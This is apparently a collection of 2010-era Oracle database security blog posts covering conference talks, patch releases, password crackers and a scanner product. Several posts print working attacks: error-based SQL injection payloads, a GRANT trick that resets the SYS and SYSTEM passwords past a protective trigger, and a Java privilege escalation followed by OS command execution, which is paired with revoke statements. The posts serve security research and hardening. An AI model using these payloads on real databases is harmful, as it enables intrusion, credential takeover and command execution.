The Blackhat Europe 2010 “Oracle, Interrupted: Stealing Sessions and Credentials” (presentation, whitepaper) of Steve Ocepek and Wendel G. Henrique are online. An interview with Steve about the talk can be found here.

As mentioned in a previous blog post this talk  shows how to intercept unencrypted (=default) TNS connections and inject statements into a running session. Steve and Wendel will soon release 2 tools Vamp and thicknet.

I will try to present these tools at the DOAG Expertenseminar in Berlin.

A good summary of the talk can be found at Peter Van Eeckhoutten’s blog.

Dennis Yurichev has released a new password cracker (brute-force) called ops_sse2 for Oracle DES passwords.  This password cracker is the fastest brute force cracker for Oracle DES passwords and approx. 3 times faster than woraauthbf from Laszlo Toth.

Here a quick comparision on my Quad2Core (2.4 GHz):

Password length (8 character) (only characters) can be cracked  in approx 3 hours. For numbers and characters it takes approx. 2.5 days for a single password.

Impressive work…

I just came across a forum entry on OTN “Possible trojan with 11gR2 Windows 32-bit client on OTN?“. It seems that some virus scanners are reporting a potential trojan in the 32bit client of Oracle 11R2.

According the Eric Maurice from the Oracle security team it is a false positive of the Avira Antivir scanner engine.

It is good to know that also large software vendors are running in this problem of false positives. This can be really bad for the reputation of a software vendor.

Niels Teusink has posted a Python script to unwrap PL/SQL code (10g+ only). This python script can unwrap code on the command line.

More details are available in the blog entry of Niels.

This is a better solution than the online unwrapper.

Oracle just released the Oracle CPU (and PSU) for April 2010. As mentioned in a previous blog post this CPU contains 7 new security vulnerabilities.  7 new security vulnerability fixes. None of these vulnerabilities are remote exploitable without authentication.

The highest CVSS base score for the Oracle database is 7.5 (Oracle Fusion Middleware). It seems that the Java 0day from David Litchfield is also fixed. But I have to download the Oracle patches to verify that all bugs are fixed.

The following components are affected:

• Change Data Capture
• Core RDBMS
• JavaVM
• Oracle XDB
• RDBMS Security
• XML DB
• Audit

This time all Oracle vulnerabilities are coming from the usual suspects:
Okan Basegmez of DORASEC Consulting; Esteban Martinez Fayo of Application Security, Inc.; Joxean Koret; Alexander Kornbrust of Red Database Security; David Litchfield formerly of NGS Software; Oleg P. of HSC Security Portal; and Alexandr Polyakov of Digital Security.

Oracle has fixed a problem (CVE-2010-0854) I reported in January 2009. It is possible to bypass Oracle Auditing using explain plan. Within the next few days I will release an advisory for this problem.

Joxean Koreat has released his presentation “Hackproofing Oracle Financials 11i / R12” from RootedCON 2010. Joxean shows some nice ways to own old and new Oracle Financials installations.

Thanks to Sid for the link via twitter.

This weekend I installed the new version of Oracle 11.2.0.1 (64 bit) for Windows. The 11.2 version for Windows is available since a few days.

I installed the 64 bit version (default installation (next - next - …)) without any problems  on Windows 7 system. After that I run a default check with our database scanner Repscan 3 (the most advanced database scanner) against this new database version. According to Repscan this new 11.2.0.1 is no longer vulnerable against the DBMS_JVM_EXP_PERMS exploit and this is correct. Oracle has already fixed the problem. I expect a solution in the upcoming Oracle CPU April 2010.

A quick check in the Repscan database browser shows the difference in the privileges:

11.2.0.1.0 Linux:

11.2.0.1.0 Windows:

Oracle removed the public privilege from DBMS_JVM_EXP_PERMS and granted privileges to the roles “IMP_FULL_DATABASE” and “DATAPUMP_EXP_FULL_DATABASE”.   The privileges of DBMS_JAVA and DBMS_JAVA_TEST are not modified.

The package DBMS_JVM_EXP_PERMS contains also a bug fix. A comparision between the Windows and Linux version shows the following differencein the package body.

— DBMS_JVM_EXP_PERMS  (only in 11.2.0.1 Windows) ——————
[…]
– Check privs
sys.dbms_zhelp_ir.check_sys_priv(DBMS_ZHELP_IR.KZSSTA);
[…]
— DBMS_JVM_EXP_PERMS ——————
After that I analyzed the Oracle database with the Repscan database browser (really useful component, just try the trial version of Repscan) found a few suspicous audit entries in my audit log (sys.aud$).

A user AIME from the terminal “ST-ADC\DADVFH0169″ had a connection to my database?I know that the terminal “ST-ADC\DADVFH0169″ is a terminal somewhere from Oracle. A backdoor in 11.2.0.1? Someone from Oracle was accessing my database?

No. After I checked the timestamp I saw that this entry was created 2 days BEFORE I installed my database. Oracle only forgot to cleanup the audit log before delivering it to customers. If you install Oracle 11.2.0.1 you should truncate the SYS.AUD$ table to avoid questions from (internal/external) auditors.

Paul released a new article about Oracle Java Forensics. He describes how to find traces of Java attacks (e.g. via dbms_jvm_exp_perms) in the Oracle database.

I’ve got some nice ideas from Paul’s article.

Well done.

Microsoft released a patch for CVE-2010-0490. More than 1 year ago I reported this issue to Microsoft.

Finally they fixed the problem.

Bug History:

5-February-2009 - Bug reported to Microsoft Security Response Center

30-March-2010 - Patch for CVE-2010-0490 released

Today Laszlo sent me an email that he published the English version of his Hacktivity 2009 talk “Oracle authentication” on his webpage. Laszlo was so nice to give me an English private session last year at the Hacktivity in Budapest.

His presentation contains the following topics:

• Introduction
• Oracle native authentication (database)
• Downgrade (Flash Demo)
• Windows authentication
• Module for Squirtle (Flash Demo)
• pytnsproxy  (Flash Demo)

I like the part where Laszlo shows how to hijack an Oracle session.

This presentation is a must for everyone interested in the Oracle authentication process.

Well done Laszlo.

Today I came across a nice blog article “Methods of quick exploitation of blind SQL Injection Vulnerabilities in Oracle” from Dmitry Evteev about new techniques which can be used in error-based SQL injection. One of the comments contains an additional technique. Even if the title of the blog is not correct for Oracle (it’s not blind SQL Injection it’s error based which is a small but important difference) the idea itself is nice. Sometimes the SQL statements are more complicated than necessary.

Using error messages of XMLType:

The XMLType allows to create error messages containing custom strings (like database users, passwords, …). The string must start with a ‘<:’ that’s why we have to concatenate  ‘<:’  to the string.  Additionally the all spaces and at-signs must be replaced.

SQL> select XMLType((’<:’||user||’>’)) from dual;
ERROR:
ORA-31011: XML parsing failed
ORA-19202: Error occurred in XML processing
LPX-00110: Warning: invalid QName “:SYS” (not a Name)
Error at line 1
ORA-06512: at “SYS.XMLTYPE”, line 0
ORA-06512: at line 1

SQL> select XMLType((’<:’||replace((select banner from v$version where rownum=1) ,’ ‘,”)||’>’)) from dual;
ERROR:
19
ORA-19202: Error occurred in XML processing
LPX-00110: Warning: invalid QName
“:Oracle9iEnterpriseEditionRelease9.2.0.8.0-Production” (not a Name)
Error at line 1
ORA-06512: at “SYS.XMLTYPE”, line 0
ORA-06512: at line 1

This can be used in an SQL Injection statement:

or 1=length(XMLType((’<:’||replace((select banner from v$version where rownum=1) ,’ ‘,”)||’>’)))–

The second technique is mentioned in the comments: 

SQL> select extractvalue(xmltype(’<x/>’),’/$’||(SELECT banner FROM v$version where rownum=1)) from dual;

*
ERROR at line 1:
ORA-31011: XML parsing failed
ORA-19202: Error occurred in XML processing
LPX-00601: Invalid token in: ‘/$Oracle Database 10g Express Edition Release 10.2.0.1.0 - Product‘

 This can be used in an SQL Injection statement:

or 1=length(extractvalue(xmltype(’<x/>’),’/$’||(SELECT banner FROM v$version where rownum=1)))–

I found the following nice article “How to Prevent a User Granted the ALTER USER Privilege From Changing SYS/SYSTEM password” [271077.1] on My Oracle Support. As always if I see PL/SQL code I am looking for ways to find security problems or to bypass limitations.

SQL> conn  / as sysdba
Connected.

SQL> CREATE or REPLACE TRIGGER prohibit_alter_SYSTEM_SYS_pass
AFTER ALTER on SCOTT.schema
BEGIN
IF ora_sysevent=’ALTER’ and ora_dict_obj_type = ‘USER’ and
(ora_dict_obj_name = ‘SYSTEM’ or ora_dict_obj_name = ‘SYS’)
THEN
RAISE_APPLICATION_ERROR(-20003,
‘You are not allowed to alter SYSTEM/SYS user.’);
END IF;
END;
/

Trigger created.

SQL> conn scott/tiger
Connected.

SQL>alter user system identified by alex;
alter user system identified by alex
*
ERROR at line 1:
ORA-00604: error occurred at recursive SQL level 1
ORA-20003: You are not allowed to alter SYSTEM/SYS user.
ORA-06512: at line 5

SQL> alter user sys identified by alex;
alter user sys identified by alex
*
ERROR at line 1:
ORA-00604: error occurred at recursive SQL level 1
ORA-20003: You are not allowed to alter SYSTEM/SYS user.
ORA-06512: at line 5

SQL> alter user dbsnmp identified by dbsnmp;
User altered.

Many Oracle users are not aware that the grant command can also be used to change passwords or even create users (”grant dba to user1,user2 identified by user1,user2″). In our case we can use this technique to bypass the database trigger.
SQL> grant connect to sys identified by alex;
Grant succeeded.

SQL> grant connect to system identified by alex;
Grant succeeded.

To fix this problem we have to block grant commands as well….

The latest version 3.0 of our database scanner Repscan is now available. This new version supports MS SQL Server and Oracle databases. Repscan comes with a large amount of new features and a complete new GUI (First database scanner with Office-2007 UI).

Here some of the new features of Repscan 3.0:

• Support for MS SQL Server (2000, 2005, 2008)
• Extremely user-friendly database configuration wizard (screenshot)
• Flexible tree control (re-group databases by status, hierarchy, …) (screenshot)
• Database security browser with drill down functionality (PDF, XLS, … export) (screenshot, screenshot)
• New reports (performance, used_features, …)
• Data Discovery (SSN, PII, Creditcard, Passwords, …)
• Database Enumeration (custom, NMap support) (screenshot)
• Pentest Features (Guess SID, Check default username/password combinations, …)
• Exploit & Code Library (screenshot)
• Version and Patch Information
• Skins

Here some (old) features of Repscan:

• Password plugin architecture
• Password plugins for Oracle DES, SHA1, OID, APEX, OVS
• Commandline features
• PL/SQL Source Code Analysis Report

Here some statements of Repscan 3.0 users:

“Repscan Rocks”, “I must have this tool.”, “Very cool stuff”, “really like the clean interface… checks are great”, “…tend to be more Oracle security information hub than just scanner :-)”

Over the next  few weeks I will show here more details of some Repscan 3.0 features.

If you want to test Repscan 3.0 you can download it from our exclusive distributor Sentrigo

Sumit Siddarth (Sid) has just published a really good whitepaper about “Hacking Oracle from the Web“.This is the most comprehensive published collection of different techniques for attacking Oracle from the web. Sid spent a lot of time composing the different techniques mentioned in various presentations and whitepapers.

Sid describes various techniques like data extraction (inband techniques like union or error messages, out-of-band techniques like heavy queries, blind, …), privilege escalation (sys.kupp$proc, dbms_repcat_rpc and dbms_export_extension)  and OS code execution.

Well done Sid.

Mike Smithers, a former colleague, maintains a nice blog called “The Anti-Kyte“. He wrote a really interesting article “Self-Inflicted SQL Injection – don’t quote me !” about SQL Injection in Oracle.

Well written Mike.

Blackhat removed the video from David Litchfield (containing the 0day exploit code for 11g) from their website. But it’s too late because the 0day code for 11g can be found in the meantime in many places.

The video was downloaded several times and it’s just a question of time until it re-appears…

BTW Oracle 10.2.0.4 with all security patches is vulnerable against this issue too. But the exploit must be modified a little bit.

I just read on Sumit Siddarth’s (Sid) blog that the video recording from David Litchfield’s BH presentation is was online.

<<UPDATE>> The video was removed from the Blackhat website. <<UPDATE>>

David showed how to escalate Java privileges using DBMS_JVM_EXP_PERMS.

DECLARE
POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
CURSOR C1 IS SELECT ‘GRANT’,USER(), ‘SYS’,’java.io.FilePermission’,’<<ALL FILES>>‘,’execute’,’ENABLED’ from dual;
BEGIN
OPEN C1;
FETCH C1 BULK COLLECT INTO POL;
CLOSE C1;
DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
END;
/

After the Java privilege escalation it is possible to run OS commands using a simple SELECT statement:

select dbms_java.runjava(’oracle/aurora/util/Wrapper c:\\windows\\system32\\cmd.exe /c dir>c:\\out.lst’)from dual;

For security reasons you should:

revoke execute on dbms_java from PUBLIC;
revoke execute on dbms_java_test from PUBLIC;
revoke execute on “oracle/aurora/util/Wrapper” from PUBLIC;
grant execute on sys.dbms_jvm_exp_perms to IMP_FULL_DATABASE;
grant execute on sys.dbms_jvm_exp_perms to EXP_FULL_DATABASE;
revoke execute on sys.dbms_jvm_exp_perms from PUBLIC;

I just tested the code on my Linux 11.2.0.1 database and it worked without any problem.

SELECT * from dual where chr(42)=DBMS_JAVA.RUNJAVA(’oracle/aurora/util/Wrapper /bin/touch /tmp/iwashere3′);

I came across an interesting article in the German newspaper FAZ. Someone is offering data of 1500 Swiss bank customers (with black money) to the German government for 2.5 Million EURO. A quick check of the tax fraud investigators showed that the data is reliable.

The Return on Invest (ROI) is approx. 100 Mill EUR for the German government (4% for the data thief). Our minister of finance is still thinking if he should make this deal. This would be good for the German government (more money, less taxes for Germans) but bad for the Swiss banking industry.